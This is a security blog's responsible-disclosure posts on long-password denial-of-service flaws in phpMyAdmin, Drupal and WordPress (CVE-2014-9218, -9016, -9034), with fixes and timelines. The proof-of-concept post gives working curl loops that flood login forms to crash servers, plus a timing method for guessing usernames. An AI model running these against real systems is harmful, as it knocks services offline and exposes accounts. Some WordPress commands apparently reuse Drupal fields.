In phpMyAdmin the attack works different because phpMyAdmin does not maintain any user accounts and when the user logs
into phpMyAdmin, it simply relays the password to MySQL, and MySQL is not affected by this vulnerability. These are the results of these MySQL login attempts:</div>
<div style="text-align: justify;">
<br />
Password length: 1000000 Total execution time in seconds: 0.018867969512939<br />
Password length: 2000000 Total execution time in seconds: 0.03835391998291<br />
Password length: 3000000 Total execution time in seconds: 0.056785106658936<br />
Password length: 4000000 Total execution time in seconds: 0.075578212738037<br />
Password length: 5000000 Total execution time in seconds: 0.09423303604126<br />
Password length: 6000000 Total execution time in seconds: 0.11118984222412<br />
Password length: 7000000 Total execution time in seconds: 0.13226509094238<br />
Password length: 8000000 Total execution time in seconds: 0.1476719379425<br />
Password length: 9000000 Total execution time in seconds: 0.16580295562744</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
So, which is the cause because phpMyAdmin is affected to this kind of attack?</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If we try a login attempt by using a valid or non valid username and a 1.000.000 length password we will obtain the error below.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRuNBLKl3Ymm2pbB5BHAeqDkb_z38MctsWarXsyww3DHdhpap8C6zxjb0Y2eVwfBOPIQ37aQhPG_3i2xgPLNrmsMoxG4Dc9sgWasaOQpu9NPscwLzEVBuNJcbIllNSfSnaO-pMY5UgndM/s1600/phpmyadmin.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRuNBLKl3Ymm2pbB5BHAeqDkb_z38MctsWarXsyww3DHdhpap8C6zxjb0Y2eVwfBOPIQ37aQhPG_3i2xgPLNrmsMoxG4Dc9sgWasaOQpu9NPscwLzEVBuNJcbIllNSfSnaO-pMY5UgndM/s1600/phpmyadmin.png" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
* Notice that 30 seconds is the <a href="http://php.net/manual/en/function.set-time-limit.php" target="_blank">maximum time</a> a script is allowed to run
before it is terminated by the parser. This helps prevent poorly
written scripts from tying up the server.<br />
<br />
Researching a little
bit more, we see that in PhpMyAdmin cookie mode authentication, the
password is stored, encrypted with the <a href="http://docs.phpmyadmin.net/en/latest/config.html" target="_blank">AES algorithm</a>, in a <a href="http://docs.phpmyadmin.net/en/latest/setup.html" target="_blank">temporary cookie</a>.<br />
<br />
<div id=":jn.co">
We have tried to encrypt with AES these long strings and
we have observed an increase of time calculation according to the
length the strings.</div>
<br />
Text length: 1024 ==> AES calculation time in seconds: 0.0085389614105225<br />
Text length: 10240 ==> AES calculation time in seconds: 0.069222927093506<br />
Text length: 51200 ==> AES calculation time in seconds: 0.35328578948975<br />
Text length: 102400 ==> AES calculation time in seconds: 0.72205591201782<br />
Text length: 512000 ==> AES calculation time in seconds: 3.5483829975128<br />
Text length: 1024000 ==> AES calculation time in seconds: 7.1560480594635<br />
Text length: 102400000 ==> AES calculation time in seconds: 733.4890639782</div>
<br />
<div style="text-align: justify;">
When this test was performed locally, a CPU resource exhaustion was observed. Notice that the server doesn't crash because of the AES calculation. <u>The vulnerability appears in conjunction with Apache, because Apache waits to PHP to finish the AES calculation. In a concurrent authentication process with a valid or non valid user and very long passwords, on the one hand PHP consumes the CPU with AES calculation processes and in the other hand, the Apache processes which are waiting, consumes the memory until the server crashes.</u><br />
<br />
The result is a Denial of Service condition because of memory exhaustion.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8Y0kbjjzxVHSi6j_aBlyZ6ijVLT-F2QgCgJ7z4VOyfTQ6LSGmqwtN4WyASKUOTiMTH6dS6gqSmpWo0cjZWaHqGpQM9Al9JyNQQOpNuMrJs0DvibNVVd18taeSNolHZKQnRnGXTssy18M/s1600/phpMyAdminCrash.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8Y0kbjjzxVHSi6j_aBlyZ6ijVLT-F2QgCgJ7z4VOyfTQ6LSGmqwtN4WyASKUOTiMTH6dS6gqSmpWo0cjZWaHqGpQM9Al9JyNQQOpNuMrJs0DvibNVVd18taeSNolHZKQnRnGXTssy18M/s1600/phpMyAdminCrash.png" height="222" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This problem is solved in the latest phpMyAdmin patch. <u>By applying this patch, the user credentials are stored only after a successful
authentication. Further, it truncates passwords to a length of 256.</u></div>
<h2>
How to fix</h2>
Upgrade to phpMyAdmin 4.0.10.7 or newer, or 4.1.14.8 or newer, or 4.2.13.1 or newer.
<br />
<h2>
Proof of concept</h2>
A proof of concept will be published soon. Until that, update your phpMyAdmin installations.<br />
<h2>
CVE Information</h2>
CVE-2014-9218 has been assigned to this vulnerability.<br />
<h2>
Timeline</h2>
<div style="text-align: justify;">
November 26, 2014 - We sent a complete report about the vulnerability to the phpMyAdmin security team.</div>
<br />
<div style="text-align: justify;">
November 27, 2014 - phpMyAdmin started to work on this security issue.<br />
<br />
December 3, 2014 - The phpMyAdmin security update and the security advisory is published.</div>
<h2>
References</h2>
<a href="http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html" target="_blank">http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html</a><br />
<br />
<a href="http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html" target="_blank">http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html</a><br />
<br />
<a href="http://www.devconsole.info/?p=1050" target="_blank">http://www.devconsole.info/?p=1050 </a><br />
<br />
<a href="http://www.breaksec.com/?p=6362" target="_blank">http://www.breaksec.com/?p=6362</a><br />
<br />
<a href="http://codeseekah.com/2012/04/29/timing-attacks-in-web-applications/" target="_blank">http://codeseekah.com/2012/04/29/timing-attacks-in-web-applications/</a><br />
<br />
<br />Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com0tag:blogger.com,1999:blog-3160485247929481680.post-67044954730348411832014-12-01T06:40:00.000-08:002014-12-01T07:14:53.150-08:00CVE-2014-9016 and CVE-2014-9034 Proof of Concept<div style="text-align: justify;">
Assuming that time enough has happened since the security update was released by Wordpress and Drupal, we want to share our researches. As you already know, we believe in Responsible Disclosure and that is the reason why we didn't publish this post before.<br />
<br /></div>
<div style="text-align: center;">
<iframe allowfullscreen="" frameborder="0" height="344" src="https://www.youtube.com/embed/MpF39GhcYKQ" width="459"></iframe></div>
<div style="text-align: center;">
Set Quality to 720p</div>
<h2 style="text-align: justify;">
Drupal Denial of Service CVE-2014-9016</h2>
<u>Generate a pyaload and try with a non-valid user:</u><br />
<br />
$ echo -n "name=NO-VALID-USER&pass=" > no_valid_user_payload
&& printf "%s" {1..1000000} >> no_valid_user_payload
&& echo -n "&op=Log in&form_id=user_login" >>
no_valid_user_payload<br />
<br />
$ time curl --data @no_valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &<br />
<br />
<u>Generate a pyaload and try with a valid user:</u><br />
<br />
$ echo -n "name=admin&pass=" > valid_user_payload &&
printf "%s" {1..1000000} >> valid_user_payload && echo -n
"&op=Log in&form_id=user_login" >> valid_user_payload<br />
<br />
$ time curl --data @valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &<br />
<br />
<u>Perform a Dos with a valid user:</u><br />
<br />
$ for i in `seq 1 150`; do (curl --data @valid_user_payload
http://yoursite/drupal/?q=user --silent > /dev/null &);
sleep 0.25; done<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<h2 style="text-align: justify;">
Wordpress Denial of Service CVE-2014-9034</h2>
<u>Generate a pyaload and try with a non-valid user:</u><br />
<br />
$ echo -n "log=NO-VALID-USER&pwd=" > payload && printf "%s"
{1..1000000} >> payload && echo -n "&wp-submit=Log In"
>> payload<br />
<br />
$ time curl --data @no_valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &<br />
<br />
<u>Generate a pyaload and try with a valid user:</u><br />
<br />
$ echo -n "name=admin&pass=" > valid_user_payload &&
printf "%s" {1..1000000} >> valid_user_payload && echo -n
"&op=Log in&form_id=user_login" >> valid_user_payload<br />
<br />
$ time curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &<br />
<br />
<u>Perform a Dos with a valid user:</u><br />
<br />
$ for i in `seq 1 150`; do (curl --data @valid_user_payload
http://yoursite/wordpress/wp-login.php --silent > /dev/null &);
sleep 0.25; done<br />
<h2>
Python Code</h2>
<a href="https://github.com/c0r3dump3d/wp_drupal_timing_attack" target="_blank">https://github.com/c0r3dump3d/wp_drupal_timing_attack</a><br />
<h2>
References</h2>
<a href="http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html" target="_blank">http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html</a><br />
<br />
<a href="http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html" target="_blank">http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html</a><br />
<br />
<a href="http://www.devconsole.info/?p=1050" target="_blank">http://www.devconsole.info/?p=1050 </a><br />
<br />
<a href="https://wordpress.org/news/2014/11/wordpress-4-0-1/" target="_blank"><span style="font-weight: normal;">https://wordpress.org/news/2014/11/wordpress-4-0-1/ </span></a><br />
<br />
<a href="https://www.drupal.org/SA-CORE-2014-006" target="_blank"><span style="font-weight: normal;">https://www.drupal.org/SA-CORE-2014-006 </span></a><br />
<span style="font-weight: normal;"><br /></span>
<span style="font-weight: normal;"><a href="https://www.drupal.org/node/2378367" target="_blank">https://www.drupal.org/node/2378367</a></span><br />
<br />
<a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034" target="_blank">http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034</a><br />
<br />
<a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9016" target="_blank">http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9016</a><br />
<br />Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com0tag:blogger.com,1999:blog-3160485247929481680.post-22599963337253765952014-11-21T00:34:00.000-08:002014-12-01T07:06:08.069-08:00Wordpress Denial of Service Responsible Disclosure - Attacking with long passwords<h2>
<span style="font-weight: normal;">Introduction</span></h2>
<div style="text-align: justify;">
Wordpress is the CMS most used Worldwide. <span style="font-weight: normal;">According to <a href="http://w3techs.com/technologies/details/cm-wordpress/all/all" target="_blank">w3techs.com</a> WordPress is used by 61.1% of all the websites whose content management system they know. <u>This is 23.2% of all websites.</u></span></div>
<div style="text-align: justify;">
<span style="font-weight: normal;"><br /></span></div>
<div style="text-align: justify;">
My partner <a href="https://twitter.com/cor3dump3d" target="_blank">@cor3dump3d</a> from <a href="http://www.devconsole.info/" target="_blank">www.devconsole.info</a> and me <u>believe in <a href="http://googleonlinesecurity.blogspot.com.es/2010/07/rebooting-responsible-disclosure-focus.html" target="_blank">responsible disclosure</a>, that is the reason why we have waited until a patch has been released by Wordpress security team before <a href="https://www.schneier.com/crypto-gram-0111.html" target="_blank">revealing full details</a>.</u></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Notice that this security issue is exactly the same we talked about yesterday. Both of them, Drupal and Wordpress had the same security flaw which is now solved in the latest versions.</div>
<h2>
<span style="font-weight: normal;">Wordpress affected versions </span></h2>
<span style="font-weight: normal;">Wordpress versions prior to 4.0.1</span><br />
<br />
<span style="font-weight: normal;">More info:</span><br />
<br />
<ul>
<li><a href="https://wordpress.org/news/2014/11/wordpress-4-0-1/" target="_blank"><span style="font-weight: normal;">https://wordpress.org/news/2014/11/wordpress-4-0-1/ </span></a></li>
</ul>
<h2>
<span style="font-weight: normal;">Vulnerability Details</span></h2>
<div style="text-align: justify;">
We've been researching about the security in Wordpress and we would like
to share our results with you. We have discovered a vulnerability which
can be used against default Wordpress installations in order to:<br />
<br /></div>
<div style="text-align: justify;">
</div>
<ul style="text-align: justify;">
<li> Guess usernames</li>
<li>Perform a Denial of Service </li>
</ul>
<br />
<div style="text-align: justify;">
With the scenarios below, we will show you how this attack works.
When we want to login to Wordpress site, we need to type a
username and a password:<br />
<br /></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<u>Scenario 1:</u></div>
<div style="text-align: justify;">
If the username doesn't exist, the password hash is not calculated because the username doesn't exist.</div>
<br />
<div style="text-align: justify;">
<u>Scenario 2:</u></div>
<div style="text-align: justify;">
If the username exists, the password hash is calculated and compared
with the hash stored in the database. If the hash compared is the same,
you are granted access to the system. If not, you are rejected.</div>
<br />
<div style="text-align: justify;">
<u>Scenario 3 - Taking advantage of the vulnerability:</u><br />
<br />
<u>User guessing </u></div>
<div style="text-align: justify;">
If the username exists and the password typed is for example 1000000
A's, the fact that when a hash of such a long password is generated in
order to compare it with the hash stored in the database, it takes much
longer and the time measurement is increased. So if the delay is
increased, the username exists.<br />
<br />
In Wordpress, the way of calculating the password hash (MD5 with a salt) by using <a href="http://www.openwall.com/phpass/" target="_blank">phpass</a> results in the cpu resources being affected when really long passwords are provided.</div>
<div style="text-align: justify;">
<br />
<u>Denial of service</u></div>
<div style="text-align: justify;">
If we perform several login attempts by using a valid username at the
same
time with long passwords, that causes a Denial of Service in the
server. We have observed two different scenarios in a Wordpress 7.32,
Apache and MySQL default installation. Depending on how many login
attempts and the time between them, we will have two different
scenarios:<br />
<br /></div>
<div style="text-align: justify;">
</div>
<ul style="text-align: justify;">
<li> The DOS attack crashes the entire server because the RAM and swap is reached. Also the CPU is reached.</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjADpVncRRh_V_l__A10TfppVWZPWnyVnU-uoviwY9jnnwOuctgaA2UU9r2fLxikVB3v938BVm8fSLQkmlbLtXmwz4ZOdAJ_buCA0mGnH7jjuPjfM-tTkpKMXazc_VeSJHk-QzLVJxJNTU/s1600/Wordpress_Crash.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjADpVncRRh_V_l__A10TfppVWZPWnyVnU-uoviwY9jnnwOuctgaA2UU9r2fLxikVB3v938BVm8fSLQkmlbLtXmwz4ZOdAJ_buCA0mGnH7jjuPjfM-tTkpKMXazc_VeSJHk-QzLVJxJNTU/s1600/Wordpress_Crash.png" height="221" width="400" /></a></div>
<br />
<br />
<ul>
<li style="text-align: justify;"> The DOS attack crashes the database.</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
</div>
<span id="docs-internal-guid-49e28da2-5c7c-1c8f-473b-31c90cc6f4cd" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline;"></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIY2bROROzeExSjNdfbZKrDyW6oPTf46PFuEKB0eRQsmJIJXVie3Rmuv-d_MyszUaKWG2mJPxFQrYptccVNgH0J6fUS6sT3_jGQLHKe2JUZaJMZ_-bjBv9nCrmvlJo5Eo1me4VQAH2TNQ/s1600/Wordpress_Database_Crash-III.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIY2bROROzeExSjNdfbZKrDyW6oPTf46PFuEKB0eRQsmJIJXVie3Rmuv-d_MyszUaKWG2mJPxFQrYptccVNgH0J6fUS6sT3_jGQLHKe2JUZaJMZ_-bjBv9nCrmvlJo5Eo1me4VQAH2TNQ/s1600/Wordpress_Database_Crash-III.png" height="100" width="400" /></a></div>
<div style="text-align: justify;">
Notice the server doesn't crash because of the hash calculation. The vulnerability appears in conjunction with Apache, because Apache waits to PHP to finish the hash calculation. In a concurrent authentication process with a valid user and very long passwords, on the one hand PHP consumes the CPU with calculation processes and in the other hand, the Apache processes which are waiting, consumes the memory until the server or the database crashes.</div>
<br />
If the apache configuration is optimized and tuned to the hardware
resources, we are able to reach all sessions available quickly and
handle them for 30 seconds which performs a DOS without crashing the
server or database.<br />
<br />
Why did we say 30 seconds?<br />
<br />
30 seconds is the maximum time a script is allowed to
run before it is terminated by the parser. By default, <a href="http://php.net/manual/en/function.set-time-limit.php" target="_blank">max_execution_time</a> value is set to 30 in the php.ini config. This helps
prevent poorly written scripts from tying up the server.<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<h2>
How to fix</h2>
<div style="text-align: justify;">
If you don't have set the automatic updates in Wordpress do it or install the latest version.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In the latest version, Wordpress only calculates the hash for passwords < 4096 length.</div>
<h2>
Proof of Concept</h2>
<a href="http://www.behindthefirewalls.com/2014/12/cve-2014-9016-and-cve-2014-9034-PoC.html" target="_blank">http://www.behindthefirewalls.com/2014/12/cve-2014-9016-and-cve-2014-9034-PoC.html</a><br />
<h2>
CVE Information</h2>
CVE-2014-9034 has been assigned to this vulnerability.<br />
<br />
<a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034" target="_blank">http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034</a><br />
<h2>
References</h2>
<div id=":pv.co">
<a href="http://www.devconsole.info/?p=1050" target="_blank">http://www.devconsole.info/?p=1050</a><br />
<br /></div>
<div id=":pv.co">
</div>
<div id=":pv.co">
<a href="http://www.devconsole.info/?p=963" target="_blank">http://www.devconsole.info/?p=963</a><br />
</div>
<div id=":pv.co">
</div>
<div id=":pv.co">
<a href="http://www.openwall.com/phpass/" target="_blank">http://www.openwall.com/phpass/</a> </div>
<br />
<a href="http://codeseekah.com/2012/04/29/timing-attacks-in-web-applications/" target="_blank">http://codeseekah.com/2012/04/29/timing-attacks-in-web-applications/</a><br />
<br />
<a href="https://administratosphere.wordpress.com/2011/06/16/generating-passwords-using-crypt3/" target="_blank">https://administratosphere.wordpress.com/2011/06/16/generating-passwords-using-crypt3/ </a><br />
<br />
<a href="http://www.breaksec.com/?p=6362" target="_blank">http://www.breaksec.com/?p=6362</a><br />
<br />
<br />Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com0tag:blogger.com,1999:blog-3160485247929481680.post-49766140306729620762014-11-19T13:50:00.000-08:002014-12-01T07:05:46.070-08:00Drupal Denial of Service Responsible Disclosure - Attacking with long passwords <div style="text-align: justify;">
<h2>
<span style="font-weight: normal;">Introduction </span></h2>
First of all, let me introduce you to my partner <a href="https://twitter.com/cor3dump3d" target="_blank">@cor3dump3d</a> from <a href="http://www.devconsole.info/" target="_blank">www.devconsole.info</a> We have written this post together and we hope you enjoy it. More technical information about this topic could be found at my partner post: <a class="Xx" dir="ltr" href="http://www.google.com/url?q=http%3A%2F%2Fwww.devconsole.info%2F%3Fp%3D1050&sa=D&sntz=1&usg=AFQjCNG5gbSjvaj7-2-yWo19QajQaLEurQ" rel="nofollow noreferrer" target="_blank">http://www.devconsole.info/?p=1050</a><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
Before starting with our findings, we would like to thank <a href="https://twitter.com/drupalsecurity" target="_blank">@drupalsecurity</a> team for their quick response and for their interest in keeping Drupal secure. It is the fastest and most efficient security team we have ever talked to... Around two hours after sending the vulnerability, we received the vulnerability confirmation and a patch was proposed...<br />
<br />
As you already know, Drupal is an open source content management platform powering millions of websites and applications. It’s built, used, and supported by an active and diverse community of people around the world.<br />
<br />
<u>We believe in <a href="http://googleonlinesecurity.blogspot.com.es/2010/07/rebooting-responsible-disclosure-focus.html" target="_blank">responsible disclosure</a>, that is the reason why we have waited until a patch has been released by Drupal security team before <a href="https://www.schneier.com/crypto-gram-0111.html" target="_blank">revealing full details</a>.</u></div>
<h2>
<span style="font-weight: normal;">Drupal affected versions </span></h2>
Drupal core 7.x versions prior to 7.34<br />
Secure Password Hashes 6.x-2.x versions prior to 6.x-2.1.<br />
<br />
More info:<br />
<br />
<ul>
<li><a href="https://www.drupal.org/SA-CORE-2014-006" target="_blank">Drupal Core - Moderately Critical - Multiple Vulnerabilities - SA-CORE-2014-006</a></li>
<li><a href="https://www.drupal.org/node/2378367" target="_blank">SA-CONTRIB-2014-113 - Secure Password Hashes - Denial of Service</a></li>
</ul>
<h2>
<span style="font-weight: normal;">Vulnerability Details</span></h2>
<div style="text-align: justify;">
We've been researching about the security in Drupal and we would like
to share our results with you. We have discovered a vulnerability which
can be used against default Drupal installations in order to:</div>
<div style="text-align: justify;">
<br /></div>
<ul style="text-align: justify;">
<li> Guess usernames</li>
<li>Perform a Denial of Service </li>
</ul>
<br />
<div style="text-align: justify;">
With the scenarios below, we will show you how this attack works.
When we want to login to Drupal site, we need to type a
username and a password:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>Scenario 1:</u></div>
<div style="text-align: justify;">
If the username doesn't exist, the password hash is not calculated because the username doesn't exist.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>Scenario 2:</u></div>
<div style="text-align: justify;">
If the username exists, the password hash is calculated and compared
with the hash stored in the database. If the hash compared is the same,
you are granted access to the system. If not, you are rejected.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>Scenario 3 - Taking advantage of the vulnerability:</u><br />
<br />
<u>User guessing </u></div>
<div style="text-align: justify;">
If the username exists and the password typed is for example 1000000
A's, the fact that when a hash of such a long password is generated in order to compare it with the hash stored in the database, it takes much longer and the time measurement is increased. So if the delay is increased, the username exists.<br />
<br />
In Drupal, the way of calculating the password hash (SHA512 with a salt) by using <a href="http://www.openwall.com/phpass/" target="_blank">phpass</a> results in the cpu resources being affected when really long passwords are provided.</div>
<div style="text-align: justify;">
<br />
<u>Denial of service</u></div>
<div style="text-align: justify;">
If we perform several login attempts by using a valid username at the same
time with long passwords, that causes a Denial of Service in the
server. We have observed two different scenarios in a Drupal 7.32, Apache and MySQL default installation. Depending on how many login attempts and the time between them, we will have two different scenarios:</div>
<div style="text-align: justify;">
<br /></div>
<ul style="text-align: justify;">
<li> The DOS attack crashes the entire server because the RAM and swap is reached. Also the CPU is reached.</li>
</ul>
<br />
<ul style="text-align: justify;">
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuokLUGGwZeRNz3elLcq2E3whAqKPFGKRUOhxJIW2_ZZFwegdbk2JtV7CMxKU1H7zy-bdH9yEiJq35MO8fYwEqA3Qol9TUuKgOv4NxXCTB6k8637GH30rtJmHQ_5f-8TsgqvB_VwvW6_E/s1600/Drupal_Crash.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuokLUGGwZeRNz3elLcq2E3whAqKPFGKRUOhxJIW2_ZZFwegdbk2JtV7CMxKU1H7zy-bdH9yEiJq35MO8fYwEqA3Qol9TUuKgOv4NxXCTB6k8637GH30rtJmHQ_5f-8TsgqvB_VwvW6_E/s1600/Drupal_Crash.png" height="222" width="400" /></a></div>
<br />
<ul style="text-align: justify;">
</ul>
<div class="separator" style="clear: both; text-align: center;">
</div>
<ul style="text-align: justify;">
</ul>
<ul style="text-align: justify;">
<li style="text-align: justify;"> The DOS attack crashes the database.</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
</div>
<span id="docs-internal-guid-49e28da2-5c7c-1c8f-473b-31c90cc6f4cd" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline;"></span><br />
<ul style="text-align: justify;">
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqKN46afm-Y9W1SmNrH9JqtsowSQR0rEJy9yiaLD5KTU-gBkL-EG4DEWRvDXuAyTBfBVK3_pUuztKbInMhkA_EBr_7u7DhBBcpj_0oxHfbDDoCPuwc26BzNCKUwynMXJsit03-ngjg__g/s1600/Drupal_Crashed_III.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqKN46afm-Y9W1SmNrH9JqtsowSQR0rEJy9yiaLD5KTU-gBkL-EG4DEWRvDXuAyTBfBVK3_pUuztKbInMhkA_EBr_7u7DhBBcpj_0oxHfbDDoCPuwc26BzNCKUwynMXJsit03-ngjg__g/s1600/Drupal_Crashed_III.png" height="109" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">
Notice the server doesn't crash because of the hash calculation. The
vulnerability appears in conjunction with Apache, because Apache waits
to PHP to finish the hash calculation. In a concurrent authentication
process with a valid user and very long passwords, on the one hand PHP
consumes the CPU with calculation processes and in the other hand, the
Apache processes which are waiting, consumes the memory until the server
or the database crashes.<br />
<br />
If the apache configuration is optimized and tuned to the hardware
resources, we are able to reach all sessions available quickly and
handle them for 30 seconds which performs a DOS without crashing the
server or database.<br />
<br />
Why did we say 30 seconds?<br />
<br />
30 seconds is the maximum time a script is allowed to
run before it is terminated by the parser. By default, <a href="http://php.net/manual/en/function.set-time-limit.php" target="_blank">max_execution_time</a> value is set to 30 in the php.ini config. This helps
prevent poorly written scripts from tying up the server.</div>
<h2>
How to fix</h2>
<div style="text-align: justify;">
Install the latest version:</div>
<div style="text-align: justify;">
<br /></div>
<ul style="text-align: justify;">
<li>If you use Drupal 7.x, upgrade to <a href="https://www.drupal.org/drupal-7.34-release-notes" target="_blank">Drupal core 7.34</a>. </li>
</ul>
<div style="text-align: justify;">
<ul>
<li>If you use the Secure Password Hashes module for Drupal 6.x, upgrade to <a href="https://www.drupal.org/node/2378375">Secure Password Hashes 6.x-2.1</a> Also see the <a href="https://www.drupal.org/project/phpass">Secure Password Hashes</a> project page.</li>
</ul>
</div>
<ul style="text-align: justify;">
<li>If you have configured a custom password.inc file for your site you need to make sure that it is not prone to the same vulnerability.</li>
</ul>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Drupal 7.34 version verifies that passwords longer than 512 bytes are not hashed<br />
<h2>
Proof of Concept</h2>
<a href="http://www.behindthefirewalls.com/2014/12/cve-2014-9016-and-cve-2014-9034-PoC.html" target="_blank">http://www.behindthefirewalls.com/2014/12/cve-2014-9016-and-cve-2014-9034-PoC.html</a><br />
<h2>
CVE information</h2>
CVE-2014-9016 has been assigned to this vulnerability.<br />
<br />
<a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9016" target="_blank">http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9016</a></div>
<h2>
Timeline</h2>
<div style="text-align: justify;">
October 23, 2014 at 5:11am - We sent a complete report about the vulnerability to Drupal.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
October 23, 2014 at 6:43am - Drupal answered confirming the vulnerability and proposing a patch.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
November 19, 2014 at 8:54pm - A Drupal security update and the security advisory is published.<br />
<br />
December 01, 2014 16:05 - Proof of concept published </div>
<h2>
References</h2>
<div id=":pv.co">
<a href="http://www.openwall.com/phpass/" target="_blank">http://www.openwall.com/phpass/</a> </div>
<br />
<a href="http://www.devconsole.info/?p=963" target="_blank">http://www.devconsole.info/?p=963 </a><br />
<br />
<a href="http://codeseekah.com/2012/04/29/timing-attacks-in-web-applications/" target="_blank">http://codeseekah.com/2012/04/29/timing-attacks-in-web-applications/</a><br />
<br />
<a href="https://administratosphere.wordpress.com/2011/06/16/generating-passwords-using-crypt3/" target="_blank">https://administratosphere.wordpress.com/2011/06/16/generating-passwords-using-crypt3/ </a><br />
<br />
<a href="http://www.breaksec.com/?p=6362" target="_blank">http://www.breaksec.com/?p=6362</a><br />
<br />
<br />Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com2tag:blogger.com,1999:blog-3160485247929481680.post-86521011899792254702014-09-02T07:56:00.000-07:002014-09-02T08:13:55.608-07:00Parsero v0.75 has been included in the Kali Linux repository<div style="text-align: justify;">
Some days ago a friend told me, "Ey! Why you didn't write a post talking about how Parsero has been included in the Kali Linux repository?" "Seriously? I forgot it..." So here it is...<br />
<br />
As you already know, <a href="http://www.kali.org/" target="_blank">Kali Linux</a> is one of the most advanced and versatile penetration testing distribution ever made. Kali Linux originally started with earlier version of live Linux distribution named <a href="http://www.backtrack-linux.org/" target="_blank">BackTrack</a>. It is a GPL-compliant Linux distribution built by penetration testers for
penetration tester. With millions of downloads, it has become the most widely adopted
penetration testing framework in existence and is used by the security
community all over the world.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
That is the reason why I am really proud of announcing that my tool <a href="http://www.behindthefirewalls.com/search/label/Parsero" target="_blank">Parsero</a> has been included in the Kali Linux repositories: <a class="moz-txt-link-freetext" href="http://tools.kali.org/information-gathering/parsero">http://tools.kali.org/information-gathering/parsero</a> <br />
